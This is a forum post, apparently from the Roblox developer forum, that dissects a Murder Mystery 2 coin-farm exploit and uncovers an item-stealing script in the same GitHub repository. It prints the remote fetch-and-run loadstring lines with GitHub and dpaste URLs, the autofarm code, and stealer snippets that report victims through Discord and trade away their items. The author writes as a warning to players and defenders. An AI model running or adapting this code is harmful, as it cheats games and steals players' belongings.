Introduction.
Hello there.Recently, I have been wondering, how exploits work, and how Roblox doesn’t detect them, because I see so much exploiters literally ruining each and every game I join to. And for educational purposes, to just see what’s under the hood, y’know?
But what I discovered is much more sinister and evil than just normal exploiting, which you’ll just have to see.
Warning: I suggest you not to attempt anything in this post, it might lead you to a ban or hate, or whatever more. I also highly discourage you to click or enter any of these links, as they might steal your data, and probably are malicious.
Anyway, enough with the introduction, and lets jump in.
The fun part.
Now, I wanted to focus more on game specific exploits, as they are probably a little easier to take apart, so lets pick a game… how about, MM2? Sounds like a decent pick, coin farms, aimbot, ESP? All the juicy goodness, but we are only going to go through one of the exploits in this post, the coin farming, as I see its quite interesting.
Now, I found a showcase youtube video, talking about a coin/egg farm in MM2, the video was made by a channel named “Tool Scripts”.
Let’s take a look at the video:
(let me know if this doesn’t work)
Im only going to include links that are safe to go on, pages like Github, and Pastebin. Links that are not Github or anything similar I highly recommend you do not go on, unless you know what you are doing.
(DO NOT RUN ANY OF THESE SCRIPTS!!! IM NOT RESPONSIBLE FOR YOUR ACCOUNT!!!)
I went down to the description, and found a link, which Im guessing leads you to the loadstring to put into your executor, now it told me to do some tasks, I “did” them, by of course clicking until it let me in, and I got lead to a raw pastebin page, containing this:
loadstring(game:HttpGet('https://raw.githubusercontent[dot]com/zdkjaime/MM2/refs/heads/main/MM2HUB'))()
Now this link looks like it grabs code from some kind of file on Github, and runs it with loadstring, seems simple enough.
Now, we can get the actual Github repo, and the file, by just changing some things in the url.
5 minutes later, and some magic, it leads us to this Github page:
Now, we can see, what its running, looks like its running some obfuscated code, which is a ton of gibberish. So we won’t really be able to understand whats going on.
But, if you look, theres a tiny little detail, do you know what it is? Just so you know its not related to the code.
If you said, there’s more files in the Github repo, you would be correct!
Now I looked through the files, and tried to deobfuscate one of the files called “AutoFarmV2”, but it seems very difficult and time consuming, maybe if this gets more attention, I might look more into it.
Now, crazy thing… THEY ARE STILL UPDATING THE REPO!! 
At the time of writing this, they have added 2 new files, an hour ago, with one of them not being obfuscated, yippee!
Though the code is absolute sludge, and is just flying and fling scripts, here is one of them:
It might not work, by the time your reading this, and might be obfuscated, sorry.
But what I will do, is provide a code snippet to how the coin farm works, this is provided inside the new script:
(DO NOT USE THIS CODE, YOU WILL GET BANNED, YOU HAVE BEEN WARNED!!)
Auto-farm Coins
-- Función para obtener la moneda más cercana
function AutoFarm:getNearestCoin()
local closest_coin, min_distance = nil, math.huge
for _, model in pairs(workspace:GetChildren()) do
if model:FindFirstChild("CoinContainer") then
for _, coin in pairs(model.CoinContainer:GetChildren()) do
if coin:GetAttribute("CoinID") == self.ToFarm and coin:FindFirstChild("TouchInterest") then
local distance = (self.HumanoidRootPart.Position - coin.Position).Magnitude
if distance < min_distance then
closest_coin = coin
min_distance = distance
end
end
end
end
end
return closest_coin, min_distance
end
-- Función para tweenear al objetivo (con control de velocidad)
function AutoFarm:tweenTo(position, baseSpeed)
local adjustedSpeed = baseSpeed * (30 / self.speed) -- Ajuste inverso (mayor número = más lento)
local tween = game:GetService("TweenService"):Create(
self.HumanoidRootPart,
TweenInfo.new(adjustedSpeed, Enum.EasingStyle.Linear),
{CFrame = position}
)
tween:Play()
return tween
end
-- Bucle principal del autofarm
function AutoFarm:startFarmingLoop()
spawn(function()
while self.Enabled do
if not self.bag_full and self.Character and self.HumanoidRootPart then
local coin, distance = self:getNearestCoin()
if coin then
if distance > 150 then
self.HumanoidRootPart.CFrame = coin.CFrame
else
local tween = self:tweenTo(coin.CFrame, distance / 24) -- Base speed 50
repeat task.wait() until not coin:FindFirstChild("TouchInterest") or not self.Enabled
tween:Cancel()
end
end
end
task.wait(0.1)
end
end)
end
Seems simple, right? All it does is check what coin is closest to the player, and tweens the players CFrame, to that coin, and the process repeats itself.
I wonder why @Nikilis still hasn’t added a measure against this, seems easy to patch.
(Please do 
)
Now this is where the normal part ends, as now we get to the evil part, which makes this 10x worse.
The evil part...
Now, I found some other scripts inside this repo, and we are going to look at 2 of these, which I find disgusting and terrible.
Joiner.lua
Let’s first look at a file called Joiner.lua:
Now at first glance, it doesn’t look that bad, it looks like some kind of trading script, right until you look into the variable and function names(snippets from the actual Github repo and file):
local victimUser = readfile("user.txt")
huh… interesting… here’s another one:
local didVictimLeave = false
wow, victim? Why would the developers of this malware call variables “victim”? Another:
local function autoJoin()
local response = request({
Url = "https://discord.com/api/v9/channels/"..channelId.."/messages?limit=10",
Method = "GET",
Headers = {
['Authorization'] = token,
['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36',
["Content-Type"] = "application/json"
}
HUHHHH?!?!?!?! AN API CALL TO DISCORD?!?! WHY WOULD AN EXPLOIT CALL A DISCORD API!?!?!? AND WHY IS THE FUNCTION CALLED “AUTOJOIN”?!?!?!
Well, now this is crazy, this script literally requests some kind of data from discord. Probably for some kind of… bot?? To join and…, and!?!
Well, actually, this function only retrieves some kind of information from discord. Im guessing usernames or skins of that player. Joins that player, saves the players userId, and writes their username to some .txt file, which they might use later to steal skins.
This is only a theory, as I don’t have the discord information, and Im not sure what the .txt files contain.
But there is definitely, DEFINITELY, no reason why variable names would be called “didVictimLeave”, seems kind of suspicious, right?
Here is another snippet of code from the same file:
loadstring(game:HttpGet('https://dpaste[dot]com/533UT4V7A.txt'))()
might be different at the time your reading this. Sorry, try this, or read a little more, you’ll understand: https://dpaste[dot]com/EAEJ9K84K.txt
Now, it does the same thing as injecting a script, but, it doesn’t load from Github, and is included inside of the script, so it runs when Joiner.lua is ran.
It loads code from some other site called… dpaste??
Now, let’s look though the actual link, of what it’s actually running, im only going to include some snippets though.
(DO NOT RUN ANY OF THESE SCRIPTS, YOU WILL GET BANNED, YOU HAVE BEEN WARNED!!)
_G.Usernames = {"FAZE_SHADWO","CupidAltAccount1","CupidAltAccount55"}
_G.min_rarity = "Godly"
_G.min_value = 1
_G.pingEveryone = "Yes"
_G.whook = "https://discord.com/api/webhooks/REDACTED-FOR-FORUM"
Well x3, what do we have here?
min_rarity? definitely nothing malicious! 
Usernames? oh yeah, why would they be there? the script is absolutely safe, right!?
local function addWeaponToTrade(id)
local args = {
[1] = id,
[2] = "Weapons"
}
game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("OfferItem"):FireServer(unpack(args))
end
oh, yeah, why would there be a function to add weapons to a trade, I wonder, hmm?
Definitely, a okay!
local function SendFirstMessage(list, prefix)
local headers = {
["Content-Type"] = "application/json"
}
local fields = {
{
name = "Victim Username:",
value = plr.Name,
inline = true
},
{
name = "Join here:",
value = "https://fern.wtf/joiner?placeId=142823291&gameInstanceId=" .. game.JobId
},
{
name = "Item List:",
value = "",
inline = false
},
{
name = "Summary:",
value = string.format("Total Value: %s", totalValue),
inline = false
}
}
Oh, name = "Victim Username: ", "Join Here: "?
Absolutely, not malicious, at ALL!! 
local function SendMessage(sortedItems)
local headers = {
["Content-Type"] = "application/json"
}
local fields = {
{
name = "Victim Username:",
value = plr.Name,
inline = true
},
{
name = "Value sent:",
value = "",
inline = false
},
{
name = "Total Value beamed:",
value = string.format("Total Terabytes: %s", totalValue),
inline = false
}
}
"Value sent: "? Oh yeah, definitely, not an issue. "Total Value beamed: "? Yep nothing going on here, pal.
if #weaponsToSend > 0 then
oh yeah, weapons to send? nothing suspicious here.
But enough with the jokes, this is actually concerning.
This script gets the players inventory info in MM2, sends it to some random dude on discord, which then can join, and BEAM!! All their skins, items, e.t.c. Right off the victims own inventory.
Crazy, right??
And then, an additional spit in face:
plr:kick("Your version of Roblox may be out of date. Please update Roblox and try again later, if u using an alternate account probably need to log into main account.")
It kicks the player, with a fake message that roblox is not updated, once all the items have been stolen, the funny thing is, they couldn’t even type it out formally.
Well, now, lets move onto the second file, this ones called, “Real Script”.
Real Script
Now this one is going to be quite short, as it mainly includes the things that Joiner.lua has.
But has some additional information, and things in general.
Now lets go onto the actual file inside the repo:
This file has only one line, which looks similar to the one that Joiner.lua has, we are not going to look through it, as the file is literally the same as in Joiner.lua, just with a different url endpoint(e.g. ABCDE1234).
But the interesting thing is, that if you look through the version history, this file was literally one of the obfuscated scripts, that we looked in the previous part, but now, it’s a malware script, which steals all your items.
File Version 2 weeks ago:
File Version 12 hours ago(at the time of writing this):
People not knowing this might just use the script they always used, and BAM, all their items are stolen in a flash. I kind of feel bad for the exploiters that do not know this, and get their items stolen.
This is truly disgusting by the developer of this exploit, and I find this worse than normal exploiting.
Verdict.
Never run something, when you don’t know what it’s doing, or if its not from a trusted developer. Honestly, I just came in here to see how these scripts work, and what they do, never would have thought to come across such a goldmine, just by looking through some exploits.
The final message? Don’t exploit, ever, you don’t know what your getting into, and you’ll probably fall for a trap like this. So just don’t, please.
Anyway, thats basically it, let’s get this Github repo removed, these accounts banned, and youtube banned.
Im not sure if I went too far with all the code or the information, if I did, I am truly sorry, forgive me please.
@FAZE_SHADWO @CupidAltAccount1 @CupidAltAccount55
@Nikilis Please implement measures, thank you!!
tl;dr:
This exploit is malicious, will steal your MM2 items.
Do NOT exploit, ever, you will fall into something like this, or get banned.
Add anti-exploit measures.
Anyway, that’s it, have a blessed day/night, and thank you for reading this long-ass post.
Philippians 4:13
“I can do all things through him who strengthens me.”
Thank you!
Edit: I never thought I would get some attention, thank you very much! They are still updating the repo, and changing the code, so the things you might see are different to the ones I might see, so im sorry for that, here’s another link to that suspicious inventory stealer, as im pretty sure they have updated it, you can also check the link on “Main Script” as its exactly the same example:
https://dpaste[dot]com/EAEJ9K84K.txt
